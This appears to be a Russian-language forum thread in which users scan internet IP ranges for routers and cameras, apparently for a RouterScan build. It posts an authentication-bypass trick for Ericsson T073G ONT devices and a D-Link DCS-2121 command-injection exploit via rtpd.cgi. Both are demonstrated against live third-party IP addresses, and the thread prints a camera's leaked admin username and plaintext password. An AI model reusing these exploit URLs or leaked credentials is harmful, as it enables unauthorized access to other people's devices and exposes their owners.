sagemcom нет, хотя они находятся в диапазоне 84.18.120.ххх-84.18.121.ххх, остальное возможно с региона диапазон
Это CRC32. Написал скрипт для шифровки/расшифровки конфигурационного файла Ericsson T073G (и аналогичных ONT GPON): https://mega.nz/#!Tk4RAKSS!wsPVVhFnClBD6peImV9NeGmHT8FS1QaDTuFAzUcM2Vw Расшифровать: Code: ./decrypt_t073g_config.py decode ont_config.dat ont_config.xml Зашифровать: Code: ./decrypt_t073g_config.py encode ont_config.xml ont_config_new.dat
Нашёл заодно уязвимость в этих ONT GPON - обход авторизации при наличии в URL какой-либо из строк: "style/", "script/", "images/", "floid.html", "FLoidForm" и т.д. Например: Code: http://2.133.252.l3/wifi.html?style/ или скачиваем конфиг: Code: http://2.133.252.l3/download/ont_config.dat?autorun
Есть точка моего же провайдера. 92.38.36.234 ZyXEL Keenetic Lite II Диапазон Ip отличный от моего. От меня не пингуется и RS соответственно его не видит. На роутер с смарта захожу.
У меня не сканится. Не исключено, что бывают такие диапазоны, просканировать которые можно лишь с определённого провайдера (как и с локальными сетями).
Провайдер у нас один. С одного хаба запитаны. Вчера был на той точке 62.76.111.219, тоже не находился. У меня сейчас 62.76.107.182. Мой находится.
нельзя-ли в новую сборку добавить камеру D-Link DCS-2121? эксплойт http://_IP_/cgi-bin/rtpd.cgi?uname&-a;cat&/etc/passwd пример Spoiler http://178.168.17.82:81/cgi-bin/rtpd.cgi?uname&-a;cat&/etc/passwd п.с. просьба любителям экспериментов не подвесить камеру запросами.
роутерскан авторизируется, но инфу не вытаскивает. модель роутера чёт я не понял. Spoiler 178.168.37.251 пара - стандарт. а:а
Мало толку от эксплойта, пароль хеширован: Code: auth.backend = "htdigest" auth.backend.htdigest.userfile = "/tmp/lighttpd-htdigest.user" http://178.168.17.82:81/cgi-bin/rtpd.cgi?cat&/tmp/lighttpd-htdigest.user Единственная вкуснятина: http://178.168.17.82:81/cgi-bin/rtpd.cgi?cat&/tmp/rt61sta.dat Если есть идеи, как добыть больше инфы - велком.
Spoiler http://178.168.17.82:81/cgi-bin/rtpd.cgi?echo&AdminPasswd_ss|tdb&get&HTTPAccount AdminPasswd_ss="faina253473" http://178.168.17.82:81/cgi-bin/rtpd.cgi?echo&_AdminUser_ss|tdb&get&HTTPAccount _AdminUser_ss="admin" Или все вместе http://178.168.17.82:81/cgi-bin/rtpd.cgi?echo&_AdminUser_ss&AdminPasswd_ss|tdb&get&HTTPAccount
Забыл добавить, что если залогиниться, то по ссылке 178.168.17.82:81/common/info.cgi можно получить некоторую инфу, вида: Spoiler model=DCS-2121 version=1.04 build=3227 nipca=1.6 name=CAM1 location= macaddr=1c:AF:F7:6B:13:8A ipaddr=192.168.1.81 netmask=255.255.255.0 gateway=192.168.1.1 wireless=yes inputs=1 outputs=1 speaker=yes А вообще, там во всю busybox робит, можно дергать некоторую инфу прямо из бд http://178.168.17.82:81/cgi-bin/rtpd.cgi?/bin/busybox&more&/../etc/db/umconfig.txt http://178.168.17.82:81/cgi-bin/rtpd.cgi?/bin/busybox&more&/../etc/db/actinput.db http://178.168.17.82:81/cgi-bin/rtpd.cgi?/bin/busybox&more&/../etc/db/dbinput.db Правда в этих ничего интересного нет. Основная бд видать в скрытом каталоге лежит или я ее не нашел.
В принципе, после успешного логина достаточно GETнуть страницу /eng/admin/st_device.cgi, и там будет инфа в формате XML: Code: <oem>D-Link</oem> <product>DCS-2121</product> И тому подобное. Эксплойт добавил.
На данный момент, получается только руками перебирать? А в базу как их потом добавить? У нас много их появилось.